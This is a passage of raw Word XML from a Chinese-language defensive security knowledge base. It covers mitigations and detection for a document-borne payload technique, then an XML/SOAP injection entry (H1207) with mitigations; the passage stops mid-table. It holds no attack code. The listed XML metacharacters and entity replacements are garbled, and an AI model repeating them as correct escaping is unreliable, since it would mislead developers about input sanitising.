                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>反恶意软件</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4254C675" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以使用网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机入侵防御系统、杀毒软件和引爆室来防止文档获取和</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或执行恶意负载。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E27914" w:rsidRPr="00F368E9" w14:paraId="285A5300" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CBD8E05" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00CC5590" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId10" w:history="1">
              <w:r w:rsidR="00E27914" w:rsidRPr="00F368E9">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>停用或移除特征或编程</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EFE2EE7" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请考虑禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Microsoft Office </w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>宏</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>活动内容，以防止在文档中执行恶意负载，尽管此设置可能无法缓解此技术的</w:t>
            </w:r>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r w:rsidRPr="00F368E9">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>强制身份验证</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E27914" w:rsidRPr="00F368E9" w14:paraId="49BD652A" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C2EDCE0" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00CC5590" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidR="00E27914" w:rsidRPr="00F368E9">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CDC47DB" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以使用网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机入侵防御系统、杀毒软件和引爆室来防止文档获取和</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或执行恶意负载。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E27914" w:rsidRPr="00F368E9" w14:paraId="32E22CF6" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01DED67A" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00CC5590" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidR="00E27914" w:rsidRPr="00F368E9">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户培训</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CD6AE1B" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="00F368E9" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00F368E9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>培训用户识别社交工程技术和鱼叉式网络钓鱼电子邮件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29E39A1B" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9BD541" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:r w:rsidRPr="00E63252">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析进程行为以确定</w:t>
      </w:r>
      <w:r w:rsidRPr="00E63252">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Office </w:t>
      </w:r>
      <w:r w:rsidRPr="00E63252">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序是否正在执行操作，例如打开网络连接、读取文件、生成异常子进程（例如：</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00AF6363">
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>PowerShell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E63252">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）或其他可能与危害后相关的可疑操作行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D94E000" w14:textId="5844BDA0" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E27914" w14:paraId="44D86632" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BADFC4E" w14:textId="5CB54959" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H</w:t>
            </w:r>
            <w:r>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B57FAC" w14:textId="77777777" w:rsidR="0038146A" w:rsidRPr="00671A0D" w:rsidRDefault="0038146A" w:rsidP="0038146A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BC76DF7" w14:textId="3E4F1A3A" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CD27779" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="013E0F2A" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中间件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>WAF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="009C164D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CD55EE3" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C575BD7" w14:textId="77777777" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当用户输入以不安全的方式插入到服务器端</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档或</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SOAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息中时，会出现</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SOAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入漏洞。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元字符来修改生成的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的结构。</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的功能，可能会干扰应用程序的逻辑，执行未经授权的操作或访问敏感数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B05E142" w14:textId="4BE1F7DB" w:rsidR="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此类漏洞可能难以检测和远程利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27914">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>您应该查看应用程序的响应以及相关输入在应用程序功能中执行的目的，以确定它是否确实容易受到攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE77DB" w14:textId="0F4E3627" w:rsidR="00E27914" w:rsidRPr="00E27914" w:rsidRDefault="00E27914" w:rsidP="00E27914">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E27914" w:rsidRPr="005C4554" w14:paraId="627A7C5B" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0222FF7D" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="005C4554" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="13B00347" w14:textId="77777777" w:rsidR="00E27914" w:rsidRPr="005C4554" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E27914" w:rsidRPr="00671A0D" w14:paraId="32122D81" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10019D6E" w14:textId="0CD47119" w:rsidR="00E27914" w:rsidRPr="00671A0D" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用参数化的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XPath</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29014DCB" w14:textId="4D038327" w:rsidR="00E27914" w:rsidRPr="00671A0D" w:rsidRDefault="00E27914" w:rsidP="00E27914">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在将用户输入合并到</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文档或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SOAP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>消息之前，应用程序应验证或清理用户输入。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可以阻止包含</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>元字符的任何输入，例如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>=;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或者，可以用相应的实体替换这些字符：＆</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">; &lt;; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和＆</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>; =;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E27914" w:rsidRPr="00671A0D" w14:paraId="3F183660" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E686FA6" w14:textId="1A4443A8" w:rsidR="00E27914" w:rsidRPr="00671A0D" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用预编译的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XPath</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07901F94" w14:textId="47E43AA7" w:rsidR="00E27914" w:rsidRPr="00671A0D" w:rsidRDefault="00E27914" w:rsidP="00E27914">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>另一个更好的缓解选项是使用预编译的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XPath</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查询。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>预编译的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XPath</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>查询已在程序执行之前预先设置，而不是在用户的输入添加到字符串后动态创建。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>这是一</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>个更好的路线，因为您不必担心错过应该被转义的角色。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E27914" w:rsidRPr="00671A0D" w14:paraId="533431E1" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EEAD0E7" w14:textId="62881EA2" w:rsidR="00E27914" w:rsidRPr="00671A0D" w:rsidRDefault="00E27914" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>使用自定义错误页面</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="315CE118" w14:textId="1B0C1382" w:rsidR="00E27914" w:rsidRPr="00671A0D" w:rsidRDefault="00E27914" w:rsidP="00E27914">
            <w:pPr>
